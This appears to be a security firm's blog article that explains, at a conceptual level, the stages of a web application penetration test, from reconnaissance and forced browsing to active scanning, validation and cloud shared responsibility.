Web application attacks have made the top three threats to small-to-mid-sized businesses (SMBs) two years in a row, according to Verizon’s Data Breach Report. Web applications, or programs that run on a remote server and are delivered via a web browser, are relied on by a variety of industries such as eCommerce, healthcare, financial services, entertainment, manufacturing, and insurance.
Unfortunately, web apps often store sensitive information such as confidential business data, personally identifiable information (PII), or even protected health information (PHI). Also, web apps are particularly susceptible to being attacked by cybercriminals since they are publicly accessible via the internet. As such, organizations must prioritize web application penetration testing and security to ensure the product they provide to their customers is secure.
Successful web application security attacks can be particularly devastating. They can result in extended downtimes due to denial of service (DoS) attacks, data deletion through SQL injection attacks, theft of customer credit cards or other information from malware, or compromised end-user computers through cross-site scripting (XSS).
Web Application Penetration Test 101
Organizations often engage a trusted third-party advisor to serve as an “ethical hacker” to test their web application security. The ethical hacker will perform a web application penetration test to simulate how a real-world attacker would try to compromise the organization’s application. The project results in a detailed report on whether the system was successfully compromised (and how), identified vulnerabilities, and a comprehensive list of recommended remediation steps.
In the following sections, we will cover the different steps performed during a typical penetration testing engagement.
Credentialed vs. Non-Credentialed Testing
Non-Credentialed Web Application Penetration Testing
The penetration tester will perform a non-credentialed pen test whereby they simulate attacks against the web application portions accessible without credentials. These attacks are typically limited to testing that requires brute force attacks, where automated attempts are made to identify an existing user’s credentials.
Brute force attacks can be conducted in one of four ways:
- Match multiple passwords with a single username;
- Match multiple usernames with one password, which is known as password spraying;
- Utilize several passwords and usernames in various combinations; or
- Conduct offline attacks where brute force attempts are made to crack hashes of passwords.
In the end, a brute force attack is just a numbers game. While non-credentialed testing can reveal some vulnerabilities, the ideal approach is to combine it with credentialed pen testing, whereby the ethical hacker can assess the web application’s security while logged in with a valid username and password.
Credentialed Web Application Penetration Testing
With a credentialed approach, the attack surface dramatically increases. For example, imagine visiting a site without a user account. Certain features of the website are inaccessible without being logged in. If executing a test without user credentials, the results will not only miss individual pages but entire functions as well.
Not only does credentialed pen testing provide a more thorough assessment, but it also simulates the common occurrence where the attacker gains access to the web application through stolen user credentials. For example, in 2021, a single data breach exposed 8.4 billion passwords.
Through a process known as credential stuffing, hackers will launch automated login requests against hundreds of web applications using the stolen user names and passwords. If that user name and password are the same for a different web application (i.e., password reuse), then an attacker may find an easy way into the app to launch their attack.
Reconnaissance
Whether credentialed or non-credentialed, reconnaissance or recon is typically one of the first steps in a web application penetration test. Recon involves the collection of data about the particular target web application.
The collection of data may include, but is not limited to, identifying the following:
· Subdomains
· The presence of firewalls
· Frameworks and programming languages
· Content management systems
· Plugins
· Themes
This collection leads to a more informed, and therefore more thorough, penetration test. With this information available, cybersecurity engineers can refine their testing procedures and develop a customized attack plan.
Manual Crawl and Spidering
Every web application penetration test should begin with a manual crawl of the site, followed by automated spidering. During a typical penetration test, cybersecurity engineers will log in to the website with user credentials and manually click on every link. While doing this exercise, they will also complete the forms on the landing pages and submit the data. The general idea is to map the entire website by hand before relying on automation.
The side benefit of incorporating this step in the process is that the penetration tester can obtain a solid idea of the sitemap, features, and infrastructure, which aids them later in the process. As they crawl the site, more and more requests will be captured and passively scanned by the web application testing software.
Contrary to a manual crawl, spidering is automated and may discover unclicked links. For the best results, spidering should also be done using a logged-in account. Yet, even by visiting each link, cybersecurity engineers and the web application testing software are limited to uncovering pages that the site links to directly. Forced browsing can be used to expand further the discovery of site content during the web application security test.
Forced Browsing
Forced browsing aims to identify possible directory paths and files in the web application that do not have direct links. Although files, such as domain directories, temporary files, or old backup/configuration files, are not referenced within the web application, they may still be accessible.
Attempting to access these records during a penetration test is essential. Hackers often covet these files because of the sensitive information they may contain. For example, old backup/configuration files may have source code or internal network addressing, among other things. Using brute force attempts, this type of attack is known as Predictable Resource Location, File Enumeration, Directory Enumeration, or Resource Enumeration.
These lists can be extensive and, based on their size, can significantly increase the time needed for penetration testing. The benefit, however, is a far more thorough web application penetration test.
Passive Scanning
While spidering and forced browsing are initiated, the web application will simultaneously be scanned for potential vulnerabilities and return the information as alerts. Typically, there is nothing required on the users’ end to activate this. However, a good web application penetration test may include additional scripts, extensions, and add-ons.
Active Scanning
With the web application thoroughly mapped, and the content discovered, the penetration testing process will transition to active scanning. Active scanning modifies and sends various web requests that test for the OWASP Top 10 Web Application vulnerabilities, including SQL injection, cross-site scripting (XSS), insufficient logging and monitoring, and others.
New attack vectors that have become prevalent include XSS by uploading files or In-Direct Object Reference (IDOR). Attack popularity often changes; therefore, staying informed on the newest or most prevalent vulnerabilities is essential to conducting a more thorough web application penetration test.
False Positives and Validation
Arguably, this is an essential part of the web application pen testing process. It differentiates an actual penetration test from a vulnerability scan because what good is a penetration test without confirmation?
It is not uncommon for web application testing software to generate false positives. This issue can be extremely aggravating for the IT department responsible for patching or updating their site. Also, it can increase the cost of an organization’s remediation efforts.
It is also possible for vulnerability scans to miss important alerts because it does not account for manipulation. For example, scans cannot identify how vulnerabilities work together, known as vulnerability chaining. So two low-priority vulnerabilities that may get overlooked could, in theory, be combined to create a critical vulnerability if manipulated correctly. The results can be clouded without the capability and understanding necessary to perform validation.
The Human Element
There are many components to conducting an effective web application penetration test, many of which have been discussed above. One of the most critical factors, however, is the human element. Engaging the right people with the right experience as a trusted advisor is essential. After all, the point of a penetration test is to test how effective the web application security is at deterring a highly motivated and skilled hacker.
Many exploits and vulnerabilities can result in unintended consequences if mishandled. Some are obvious. For example, a well-trained pen tester would not verify a denial of service (DoS) vulnerability. If they did, it could take the web application offline and result in downtime.
Other attacks may be less noticeable. For example, a buffer overflow exploit and other memory-based attacks may result in a denial of service. If the pen tester does not confirm this result as a possibility, or if they are not aware of it, they might as well have launched a denial of service attack on the client’s web application. Admittedly, the result is the same.
Web Application Security in the Cloud
As with many technologies, organizations are utilizing cloud computing platforms such as Amazon Web Services (AWS) and Microsoft Azure to host their web applications. This approach’s reliability, scalability, and affordability make it an incredibly enticing option. Although cloud providers may provide some peace of mind regarding data security, they do not necessarily have responsibility for protecting the web application they are hosting. For example, AWS has the Shared Responsibility Model that specifically highlights the fact that “Security and Compliance is a shared responsibility between AWS and the customer.”
While the hosting provider manages the security of the cloud infrastructure, it is still the customer’s responsibility to ensure the security of their web application and the data within it. As such, it is essential not to fall into the trap of having a false sense of security just because your organization is using a popular cloud computing platform. Understanding what your security responsibilities are is crucial.
0 Comments